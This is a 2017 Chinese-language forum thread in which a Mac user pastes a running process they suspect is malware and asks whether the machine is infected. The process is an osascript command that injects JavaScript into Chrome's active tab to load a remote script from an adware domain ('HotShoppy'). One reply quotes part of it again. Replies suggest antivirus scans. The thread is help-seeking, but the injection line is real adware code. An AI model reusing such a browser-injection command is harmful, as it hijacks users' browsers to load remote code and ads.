V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ming7435
V2EX  ›  Apple

卧槽, mac 这是中毒了吗???

  •  
  •   ming7435 · 2017-11-22 22:55:59 +08:00 · 3392 次点击
    这是一个创建于 2560 天前的主题,其中的信息可能已经有所发展或是发生改变。

    501 58518 965 0 10:41 下午 ?? 0:00.01 osascript -e if application "Google Chrome" is running then -e log "Active" -e run script"tell application "Google Chrome"\n execute front window's active tab javascript "_webhelper_source = {GUID:'56433956730706156', SOURCE:'pic-1623', BRAND:'HotShoppy'};if ( ! document.getElementById('_webhelper_source') ) { var hiddenInput = document.createElement('input');hiddenInput.id = '_webhelper_source'; hiddenInput.type = 'hidden';hiddenInput.value = JSON.stringify(_webhelper_source);document.getElementsByTagName('body')[0].appendChild(hiddenInput);} if ( ! document.getElementById('webHelper') ) {var newScript = document.createElement('script');newScript.id = 'webHelper'; newScript.type = 'text/javascript';newScript.src = '//secure.hotshoppymac.com/servicejs/components/?source=pic-1623&version=2.0&isn=800'; var efs = document.getElementsByTagName('script')[0];if (efs) {efs.parentNode.insertBefore(newScript, efs);} else {document.getElementsByTagName('head')[0].appendChild(newScript);}}"\nend tell\n" -e end if

    第 1 条附言  ·  2017-11-23 09:29:31 +08:00

    sorry,问题没描述清楚,昨天开始发现每次打开Chrome的时候都弹出广告页,找了半天实在是没找到凶手,查看了一下进程发现有上面贴的那一堆东西,刚开始也是没看懂所以就直接贴过来了,后面查了一下好像有个什么叫osascript的东西,然后进程里面有一个BRAND:'HotShoppy',然后就直接在系统里面干掉了相关的文件

    9 条回复    2017-11-23 17:44:22 +08:00
    eminemcola
        1
    eminemcola  
       2017-11-22 23:56:37 +08:00 via iPhone
    一个不懂得如何提问的典型例子
    zhangxs8964
        2
    zhangxs8964  
       2017-11-23 00:22:47 +08:00 via Android
    是,中医可治疗
    minamike
        3
    minamike  
       2017-11-23 07:39:38 +08:00 via iPhone
    我感觉是你中毒了
    huangunic0rn
        4
    huangunic0rn  
       2017-11-23 08:35:07 +08:00 via Android
    蛋疼。
    楼主安装个 ESET for Mac 吧
    KNOX
        5
    KNOX  
       2017-11-23 09:12:41 +08:00 via Android
    其实…发生了什么?
    UnknownR
        6
    UnknownR  
       2017-11-23 09:44:16 +08:00
    你是不是装了 mackeeper
    lp10
        7
    lp10  
       2017-11-23 10:52:14 +08:00
    看着像,下个 Malwarebytes 查一遍毒吧。
    li746224
        8
    li746224  
       2017-11-23 11:45:54 +08:00
    貌似我电脑上也有,很烦,只有 chrome 中招,其他浏览器就没有问题
    lrigi
        9
    lrigi  
       2017-11-23 17:44:22 +08:00 via iPhone
    @li746224 if application "Google Chrome" is running then -e log "Active" -e run script"tell application "Google Chrome"\n execute front window's active tab javascript "_webhelper_source = {GUID:'56433956730706156', SOURCE:'pic-1623', BRAND:'HotShoppy'};i
    这里的代码看起来像是一个脚本之类的东西...
    如果应用 chrome 运行,
    让 Chrome 再开个活动窗口 balabala
    感觉不是很大的问题……因为代码看起来很蠢...不像是高大上的病毒代码...
    拿小红伞查查毒?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3272 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 14:02 · PVG 22:02 · LAX 06:02 · JFK 09:02
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.